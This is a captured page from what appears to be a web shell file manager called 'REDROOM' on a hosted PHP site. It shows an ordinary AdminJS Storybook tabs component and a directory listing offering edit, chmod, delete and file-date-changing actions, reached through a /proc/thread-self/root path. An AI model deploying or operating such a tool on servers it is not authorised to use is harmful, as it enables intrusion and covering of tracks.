REDROOM
PHP 8.2.30
Path:
Logout
Edit File
Size: 704 B
Close
//proc/thread-self/root/home/byroehnu/.trash/node_modules11/@adminjs/design-system/src/atoms/tabs/tabs.stories.tsx
Text
Base64
import { Meta, StoryFn } from '@storybook/react' import React, { useState } from 'react' import { Box } from '../index.js' import { Tab, Tabs } from './index.js' export const Default: StoryFn = () => { const [selectedTab, setSelectedTab] = useState('first') return ( <Tabs currentTab={selectedTab} onChange={setSelectedTab}> <Tab id="first" label="First tab"> First </Tab> <Tab id="second" label="Second tab"> <Box color="primary100">Second</Box> </Tab> <Tab id="third" label="Third tab"> Third </Tab> </Tabs> ) } const meta: Meta<typeof Tabs> = { title: 'DesignSystem/Atoms/Tabs', component: Tabs, } export default meta
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 4
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
index.ts
53 B
lrw-r--r--
2026-02-28 00:31:46
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
tab.tsx
848 B
lrw-r--r--
2026-02-28 00:32:00
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
tabs.stories.tsx
704 B
lrw-r--r--
2026-02-28 00:32:00
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
tabs.tsx
4.35 KB
lrw-r--r--
2026-02-28 00:32:00
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).